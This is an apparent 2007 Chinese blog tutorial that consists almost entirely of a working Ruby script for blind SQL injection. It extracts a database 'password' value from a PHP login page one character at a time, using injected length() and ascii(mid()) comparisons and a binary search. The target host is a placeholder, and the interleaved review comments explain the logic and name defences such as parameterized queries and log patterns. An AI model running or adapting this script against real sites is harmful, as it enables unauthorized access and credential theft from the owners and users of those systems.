2007年12月14日 星期五

[Ruby] MySQL Brute Force Attack & [教學]Exploit 21: "SQL-Injection 2"


# Author : mashimaro
# Last Modify : 2007/12/11

require 'net/http'
require 'net/https'

# Review note: this is a boolean-based blind SQL injection probe (the page
# title calls it "SQL-Injection 2"). Every decision it makes is the question
# "does the response body contain appear_str", answered once per HTTP GET.
# For defenders: a parameterized query leaves the appended "' and ..."
# fragment inert, and the traffic the script produces -- many near-identical
# GETs carrying length()/ascii(mid()) comparisons in the query string -- is a
# high-signal pattern for access-log review and WAF rules.

# Target host and the injectable path; the values on the page are placeholders.
host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
# Session cookie sent with every request (value masked on the page).
cookie = 'PHPSESSID=***********************'

http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
'Cookie' => cookie,
# 'Referer' => 'http://profil.wp.pl/login.html',
# 'Content-Type' => 'application/x-www-form-urlencoded'
}

# cmd: the SQL expression whose value is being recovered.
# appear_str: text that is present in the page only when the injected
# condition evaluates true; it is the script's only oracle.
cmd = 'password';
appear_str = 'Steven Baker';

len = 0;

# len is always 0 here, so the first branch never runs; the else branch
# always executes (left as written, documented only).
if(len > 0)
print 'len = ' + len.to_s;
else
len = 1;
print 'len = 1';
# Step 1. Determine the length of the value: repeat "length(cmd) >= len+1"
# until the oracle says no. One HTTP GET per iteration.
while(1)
resp, data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'',

headers)
break if(!data.index(appear_str));
# 8.chr is backspace: erase the previously printed count before reprinting it.
print 8.chr * len.to_s.length;
len = len + 1;
print len.to_s;
end
end


puts '';
i = 1;
print 'str = ';

# Step 2. Recover the value one character position at a time.
# The first request for position i splits the printable range at 80 ('P');
# the loop below then binary-searches [min, max] down to a single code point.
while(i <= len) print 80.chr; resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'',

headers);
if(data.index(appear_str))
min = 80;
max = 127;
else
min = 32;
max = 79;
end

# Binary search on the ASCII value; one GET per halving.
while(min != max)
# Ceiling midpoint, so "ascii >= mid" being true can set min = mid without stalling.
mid = ((min + max + 1) / 2).to_i;
print 8.chr;
print mid.chr;
# Progress indicator " [min mid max]" shown beside the current guess.
str = ' [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']';
print str;
resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' +

mid.to_s + '--\'', headers);
if(data.index(appear_str))
min = mid;
else
max = mid - 1;
end
# Defensive guard: with the ceiling midpoint min never exceeds max, so this
# only fires if the oracle answers inconsistently between requests.
if(min > max)
puts 'error: min > max';
exit(0);
end
# Erase the indicator: backspace over it, overwrite with spaces, backspace again.
print (8.chr) * str.length + ' ' * str.length + (8.chr) * str.length;
end

# Replace the last guess with the resolved character.
print 8.chr + min.chr;

i = i + 1;
end

puts "\r\n\r\n" + 'sql brute force search done!!';
